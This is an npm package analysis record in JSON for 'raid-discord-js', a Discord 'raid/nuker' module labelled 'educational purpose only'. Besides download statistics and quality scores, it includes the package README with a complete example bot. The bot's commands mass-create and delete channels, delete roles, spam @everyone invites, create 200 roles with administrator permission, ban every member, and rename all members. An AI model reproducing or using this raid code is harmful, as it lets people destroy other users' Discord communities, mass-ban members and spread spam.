{"analyzedAt":"2022-06-29T23:33:17.104Z","collected":{"metadata":{"name":"raid-discord-js","scope":"unscoped","version":"1.0.3","description":"An module who can simulate raid on discord server ( educational purpose only )","keywords":["raid","discord","raid","nuker","discord","nuker"],"date":"2022-05-04T18:17:31.010Z","author":{"name":"frost.wrld"},"publisher":{"username":"999.frost","email":"999frostz@gmail.com"},"maintainers":[{"username":"999.frost","email":"999frostz@gmail.com"}],"repository":{"type":"git","url":"git+https://github.com/999Frost/raid-discord-js-module.git"},"links":{"npm":"https://www.npmjs.com/package/raid-discord-js","homepage":"https://github.com/999Frost/raid-discord-js-module#readme","repository":"https://github.com/999Frost/raid-discord-js-module","bugs":"https://github.com/999Frost/raid-discord-js-module/issues"},"license":"ISC","dependencies":{"discord.js":"^13.6.0"},"releases":[{"from":"2022-05-30T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":0},{"from":"2022-03-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":6},{"from":"2021-12-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":6},{"from":"2021-06-29T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":6},{"from":"2020-06-29T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":6}],"readme":"<p align=\"center\"><a href=\"https://nodei.co/npm/raid-discord-js/\"><img src=\"https://nodei.co/npm/raid-discord-js.png\"></a></p>\r\n\r\n## ⚙️・Installation\r\nTo install the module, run this in your terminal :\r\n```\r\nnpm i raid-discord-js\r\n```\r\nor this \r\n```\r\nyarn add raid-discord-js\r\n```\r\n\r\n## 🏹・Example\r\n\r\nThis is an example of an easy discord bot using my package\r\n\r\n```js\r\nconst { Client } = require('discord.js');\r\nconst client = new Client({intents: 32767});\r\nconst raid = require('raid-discord-js');\r\n\r\nclient.login(\"your token\");\r\n\r\nclient.on('messageCreate', async message => {\r\n    if(message.content === \"!create-mass-channel\") {\r\n        raid.channelsCreate(message.guild, \"get-raid\", 20, 2000); // will create 20 channels name \"get-raid\" every 2 seconds\r\n    }\r\n    if(message.content === \"!delete-all-channels\") {\r\n        raid.channelsDelete(message.guild, 2000); // will delete all channels every 2 seconds\r\n    }\r\n    if(message.content === \"!spam-in-all-channels\") {\r\n        raid.SpamInAllChannels(message.guild, \"@everyone join this server! discord.gg/\", 200, 2000); // will spam \"@everyone join this server! discord.gg/\" in all channels 200 times every 2 seconds\r\n    }\r\n    if(message.content === \"!create-multiple-roles\") {\r\n        raid.rolesCreate(message.guild, \"raided\", 200, 2000, true); // will create 200 roles name \"raided\" every 2 seconds with the administrator permission ( put false at the end if you don't want this permission )\r\n    }\r\n    if(message.content === \"!delete-all-roles\") {\r\n        raid.rolesDelete(message.guild, 2000); // will delete all roles every 2 seconds\r\n    }\r\n    if(message.content === \"!spam\") {\r\n        raid.SimpleSpam(message, \"test raid\", 20, 2000); // will just spam \"test raid\" 20 times in the channel where the command is execute every 2 seconds\r\n    }\r\n    if(message.content === \"!ban-all\") {\r\n        raid.membersBan(message.guild, 2000); // will ban all members every 2 seconds\r\n    }\r\n    if(message.content === \"!rename-all-roles\") {\r\n        raid.rolesRename(message.guild, \"get-raid\", 2000); // will rename all roles \"get-raid\" every 2 seconds\r\n    }\r\n    if(message.content === \"!rename-all-members\") {\r\n        raid.membersRename(message.guild, \"frost the best\", 2000); // will rename all members \"frost is the best\" every 2 seconds\r\n    }\r\n})\r\n```\r\n\r\n## Support\r\nIf you need help, contact me on discord [here](https://discord.com/users/548028946097111045)\r\nYou can join my server [here](https://discord.gg/8J4rsqmRrp)"},"npm":{"downloads":[{"from":"2022-06-28T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":0},{"from":"2022-06-22T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":4},{"from":"2022-05-30T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":29},{"from":"2022-03-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":245},{"from":"2021-12-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":245},{"from":"2021-06-29T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":245}],"starsCount":0},"github":{"starsCount":0,"forksCount":0,"subscribersCount":1,"issues":{"count":0,"openCount":0,"distribution":{"3600":0,"10800":0,"32400":0,"97200":0,"291600":0,"874800":0,"2624400":0,"7873200":0,"23619600":0,"70858800":0,"212576400":0},"isDisabled":false},"contributors":[{"username":"999Frost","commitsCount":1}],"commits":[{"from":"2022-06-22T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":0},{"from":"2022-05-30T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":0},{"from":"2022-03-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":1},{"from":"2021-12-31T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":1},{"from":"2021-06-29T00:00:00.000Z","to":"2022-06-29T00:00:00.000Z","count":1}]},"source":{"files":{"readmeSize":2498,"testsSize":0},"badges":[{"urls":{"original":"https://nodei.co/npm/raid-discord-js.png","shields":"https://img.shields.io/npm/v/raid-discord-js.svg","content":"https://img.shields.io/npm/v/raid-discord-js.json"},"info":{"service":"npm","type":"version"}}]}},"evaluation":{"quality":{"carefulness":0.71,"tests":0,"health":1,"branding":0.15},"popularity":{"communityInterest":2,"downloadsCount":81.66666666666667,"downloadsAcceleration":0.2463280060882801,"dependentsCount":0},"maintenance":{"releasesFrequency":0.9299657534246576,"commitsFrequency":0.06400684931506849,"openIssues":0.7,"issuesDistribution":0.7}},"score":{"final":0.5343219225892425,"detail":{"quality":0.5978964008022808,"popularity":0.02960994426899779,"maintenance":0.9845414910125971}}}